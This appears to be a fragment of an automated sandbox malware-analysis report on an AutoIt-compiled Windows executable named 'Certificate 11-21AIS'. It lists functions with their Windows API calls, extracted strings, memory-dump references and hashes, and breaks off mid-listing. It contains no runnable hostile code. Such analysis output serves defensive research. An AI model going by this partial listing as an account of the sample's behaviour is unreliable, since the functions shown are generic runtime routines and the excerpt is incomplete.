                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                              • Instruction ID: 1b50f1c5bf5acb5135ae98cf7a90f44bdff16d29cbbcca0d487987b0f5c6c59f
                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                              • Instruction Fuzzy Hash: 71019278A01109EFCB49DF98C5909AEF7B5FB88310F208599E819A7341E730AE41DB80
                                                                              Function 011B60E0 Relevance: .0, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                              • Instruction ID: 31c3cccc1a78a83af18b466f20933e506993c9f2064057e01b4e455645daa9b4
                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                              • Instruction Fuzzy Hash: 6601A478A01109EFCB49DF98C5909AEF7F5FF98310F608599D819A7342E730AE41DB80
                                                                              Function 011B4AF0 Relevance: .0, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                              Function 0091A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 0091A2FE
                                                                              • DeleteObject.GDI32(00000000), ref: 0091A310
                                                                              • DestroyWindow.USER32 ref: 0091A31E
                                                                              • GetDesktopWindow.USER32 ref: 0091A338
                                                                              • GetWindowRect.USER32(00000000), ref: 0091A33F
                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0091A480
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0091A490
                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A4D8
                                                                              • GetClientRect.USER32(00000000,?), ref: 0091A4E4
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0091A51E
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A540
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A553
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A55E
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0091A567
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A576
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0091A57F
                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A586
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0091A591
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A5A3
                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0094D9BC,00000000), ref: 0091A5B9
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0091A5C9
                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0091A5EF
                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0091A60E
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A630
                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A81D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 2211948467-2373415609
                                                                              • Opcode ID: 3b6621f9df010e3328006cc8d06d9542a41a33afce3231635fc519c6bc972b55
                                                                              • Instruction ID: 35ce79879d87d7edb4c4809213e5e342a21042b45d3b083a1faeff2b444307d3
                                                                              • Opcode Fuzzy Hash: 3b6621f9df010e3328006cc8d06d9542a41a33afce3231635fc519c6bc972b55
                                                                              • Instruction Fuzzy Hash: 62028F79A11208EFDB14DFA8CD89EAE7BB9FB49310F108158F9159B2A0C770ED41DB61
                                                                              Function 0092D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0092D2DB
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0092D30C
                                                                              • GetSysColor.USER32(0000000F), ref: 0092D318
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0092D332
                                                                              • SelectObject.GDI32(?,00000000), ref: 0092D341
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0092D36C
                                                                              • GetSysColor.USER32(00000010), ref: 0092D374
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0092D37B
                                                                              • FrameRect.USER32(?,?,00000000), ref: 0092D38A
                                                                              • DeleteObject.GDI32(00000000), ref: 0092D391
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0092D3DC
                                                                              • FillRect.USER32(?,?,00000000), ref: 0092D40E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0092D439
                                                                                • Part of subcall function 0092D575: GetSysColor.USER32(00000012), ref: 0092D5AE
                                                                                • Part of subcall function 0092D575: SetTextColor.GDI32(?,?), ref: 0092D5B2
                                                                                • Part of subcall function 0092D575: GetSysColorBrush.USER32(0000000F), ref: 0092D5C8
                                                                                • Part of subcall function 0092D575: GetSysColor.USER32(0000000F), ref: 0092D5D3
                                                                                • Part of subcall function 0092D575: GetSysColor.USER32(00000011), ref: 0092D5F0
                                                                                • Part of subcall function 0092D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0092D5FE
                                                                                • Part of subcall function 0092D575: SelectObject.GDI32(?,00000000), ref: 0092D60F
                                                                                • Part of subcall function 0092D575: SetBkColor.GDI32(?,00000000), ref: 0092D618
                                                                                • Part of subcall function 0092D575: SelectObject.GDI32(?,?), ref: 0092D625
                                                                                • Part of subcall function 0092D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0092D644
                                                                                • Part of subcall function 0092D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0092D65B
                                                                                • Part of subcall function 0092D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0092D670
                                                                                • Part of subcall function 0092D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0092D698
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 3521893082-0
                                                                              • Opcode ID: 3a2e00471f9322521e884b3a0ace8c7274154b2f08feacc53054f7d3006a100e
                                                                              • Instruction ID: 5a768c1b9735b0c4f7a0114792d6bc922872a55520ff9fbdb5e34048b300f1cf
                                                                              • Opcode Fuzzy Hash: 3a2e00471f9322521e884b3a0ace8c7274154b2f08feacc53054f7d3006a100e
                                                                              • Instruction Fuzzy Hash: 2A91B17940E311BFD7109F64DC08E6B7BA9FF8A325F100A19F962961E4C730D944DB92
                                                                              Function 008DB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 008DB98B
                                                                              • DeleteObject.GDI32(00000000), ref: 008DB9CD
                                                                              • DeleteObject.GDI32(00000000), ref: 008DB9D8
                                                                              • DestroyIcon.USER32(00000000), ref: 008DB9E3
                                                                              • DestroyWindow.USER32(00000000), ref: 008DB9EE
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0093D2AA
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0093D2E3
                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0093D711
                                                                                • Part of subcall function 008DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008DB759,?,00000000,?,?,?,?,008DB72B,00000000,?), ref: 008DBA58
                                                                              • SendMessageW.USER32 ref: 0093D758
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0093D76F
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0093D785
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0093D790
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 464785882-4108050209
                                                                              • Opcode ID: 0b72c6d93b9c757f1ff579effe0dc69df5153a392f1095ba42a0fd354eee1ca4
                                                                              • Instruction ID: 6ce97e49d977d713bb3dc980ebaab7d50de371283ea8c90beea8bbfa0d9152a5
                                                                              • Opcode Fuzzy Hash: 0b72c6d93b9c757f1ff579effe0dc69df5153a392f1095ba42a0fd354eee1ca4
                                                                              • Instruction Fuzzy Hash: A7128B74206241EFDB10CF28D8A4BA9BBA9FF05318F14456AF999CB262C731EC45DF91
                                                                              Function 0090DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0090DBD6
                                                                              • GetDriveTypeW.KERNEL32(?,0095DC54,?,\\.\,0095DC00), ref: 0090DCC3
                                                                              • SetErrorMode.KERNEL32(00000000,0095DC54,?,\\.\,0095DC00), ref: 0090DE29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              • Opcode ID: af32e4ca3601efc013ce5af43fe44658a1b79d21b6d84f464680a88df7479219
                                                                              • Instruction ID: 7485f7b00f35af248a10536072d14bdbed317d10ec8401cb6f6f9f04732c14f2
                                                                              • Opcode Fuzzy Hash: af32e4ca3601efc013ce5af43fe44658a1b79d21b6d84f464680a88df7479219
                                                                              • Instruction Fuzzy Hash: 22518E31249302AFC610EBA4C882D39B7A4FBD4709B24C91AF48BDB6D1DB70D945EB42
                                                                              Function 008CCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-86951937
                                                                              • Opcode ID: a98d5c04ad8755e749be56becb571c9f28d7a01e7575d7b56c5478b0147557be
                                                                              • Instruction ID: 671997ac0dd18717ca96ec3097b6509983679ad626fa04e8d6e1e9bb42c6d8cd
                                                                              • Opcode Fuzzy Hash: a98d5c04ad8755e749be56becb571c9f28d7a01e7575d7b56c5478b0147557be
                                                                              • Instruction Fuzzy Hash: B781C471640219AACB25AB69DC83FBA3778FF55704F04403DF90AEA1C2EB70D945C792
                                                                              Function 0092638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,0095DC00), ref: 00926449
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                              • API String ID: 3964851224-45149045
                                                                              • Opcode ID: ccb6bf52184528f48d05745d648359a3f9ff0c7c3c38c4d7fc234d3fddd1d7a3
                                                                              • Instruction ID: 1dd8a2679bed7883d20ef5a0d306e94d779f6cad946d44ec09599798530f929e
                                                                              • Opcode Fuzzy Hash: ccb6bf52184528f48d05745d648359a3f9ff0c7c3c38c4d7fc234d3fddd1d7a3
                                                                              • Instruction Fuzzy Hash: 77C18F302143558BCA04EF28D551A6E77E9FF94344F108969F8869B7A7DB34ED0ACB83
                                                                              Function 0092D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 0092D5AE
                                                                              • SetTextColor.GDI32(?,?), ref: 0092D5B2
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0092D5C8
                                                                              • GetSysColor.USER32(0000000F), ref: 0092D5D3
                                                                              • CreateSolidBrush.GDI32(?), ref: 0092D5D8
                                                                              • GetSysColor.USER32(00000011), ref: 0092D5F0
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0092D5FE
                                                                              • SelectObject.GDI32(?,00000000), ref: 0092D60F
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0092D618
                                                                              • SelectObject.GDI32(?,?), ref: 0092D625
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0092D644
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0092D65B
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0092D670
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0092D698
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0092D6BF
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0092D6DD
                                                                              • DrawFocusRect.USER32(?,?), ref: 0092D6E8
                                                                              • GetSysColor.USER32(00000011), ref: 0092D6F6
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0092D6FE
                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0092D712
                                                                              • SelectObject.GDI32(?,0092D2A5), ref: 0092D729
                                                                              • DeleteObject.GDI32(?), ref: 0092D734
                                                                              • SelectObject.GDI32(?,?), ref: 0092D73A
                                                                              • DeleteObject.GDI32(?), ref: 0092D73F
                                                                              • SetTextColor.GDI32(?,?), ref: 0092D745
                                                                              • SetBkColor.GDI32(?,?), ref: 0092D74F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              • Opcode ID: 73fa883f7405b2c8c8b725f19cf0877da5234b860e69b379f2f1f249e9b32157
                                                                              • Instruction ID: 1c8e7c241828e97c259747142d0ea75bc5f5d93a9b22016bf72b5d58462b4624
                                                                              • Opcode Fuzzy Hash: 73fa883f7405b2c8c8b725f19cf0877da5234b860e69b379f2f1f249e9b32157
                                                                              • Instruction Fuzzy Hash: D4519E79906218BFDF109FA8DC48EAE7B79FF09324F204111FA15AB2A5D7709A00DF90
                                                                              Function 0092B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0092B7B0
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0092B7C1
                                                                              • CharNextW.USER32(0000014E), ref: 0092B7F0
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0092B831
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0092B847
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0092B858
                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0092B875
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0092B8C7
                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0092B8DD
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0092B90E
                                                                              • _memset.LIBCMT ref: 0092B933
                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0092B97C
                                                                              • _memset.LIBCMT ref: 0092B9DB
                                                                              • SendMessageW.USER32 ref: 0092BA05
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0092BA5D
                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0092BB0A
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0092BB2C
                                                                              • GetMenuItemInfoW.USER32(?), ref: 0092BB76
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0092BBA3
                                                                              • DrawMenuBar.USER32(?), ref: 0092BBB2
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0092BBDA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                              • String ID: 0
                                                                              • API String ID: 1073566785-4108050209
                                                                              • Opcode ID: 6c1a6c8a2437a1ba9d924ed517be18d00cb3754938d0945d4cb8c79066f05772
                                                                              • Instruction ID: 37ceea44608a45ffdf5c389e4e6527a015c8b0ef99f6c2ae9c115349e5c73bec
                                                                              • Opcode Fuzzy Hash: 6c1a6c8a2437a1ba9d924ed517be18d00cb3754938d0945d4cb8c79066f05772
                                                                              • Instruction Fuzzy Hash: ECE1CE74900228ABDF20DFA5DC84EEE7BBCFF05714F148156FA19AA294D7748A81DF60
                                                                              Function 0092764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 0092778A
                                                                              • GetDesktopWindow.USER32 ref: 0092779F
                                                                              • GetWindowRect.USER32(00000000), ref: 009277A6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00927808
                                                                              • DestroyWindow.USER32(?), ref: 00927834
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0092785D
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0092787B
                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009278A1
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 009278B6
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009278C9
                                                                              • IsWindowVisible.USER32(?), ref: 009278E9
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00927904
                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00927918
                                                                              • GetWindowRect.USER32(?,?), ref: 00927930
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00927956
                                                                              • GetMonitorInfoW.USER32 ref: 00927970
                                                                              • CopyRect.USER32(?,?), ref: 00927987
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 009279F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              • Opcode ID: 0e7be27ea3ba89b2c9d922f19955013d3c2a2fd4cd61235b033b56e5fd158e6a
                                                                              • Instruction ID: 921ab0ca1af2ad32312114af170d033094ee1eed98c67b90b6c6431fe2a9bd88
                                                                              • Opcode Fuzzy Hash: 0e7be27ea3ba89b2c9d922f19955013d3c2a2fd4cd61235b033b56e5fd158e6a
                                                                              • Instruction Fuzzy Hash: CDB16C75608311AFDB04DFA8D988B5AFBE4FF89310F00891DF599AB295D770E844CB92
                                                                              Function 008DA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008DA939
                                                                              • GetSystemMetrics.USER32(00000007), ref: 008DA941
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008DA96C
                                                                              • GetSystemMetrics.USER32(00000008), ref: 008DA974
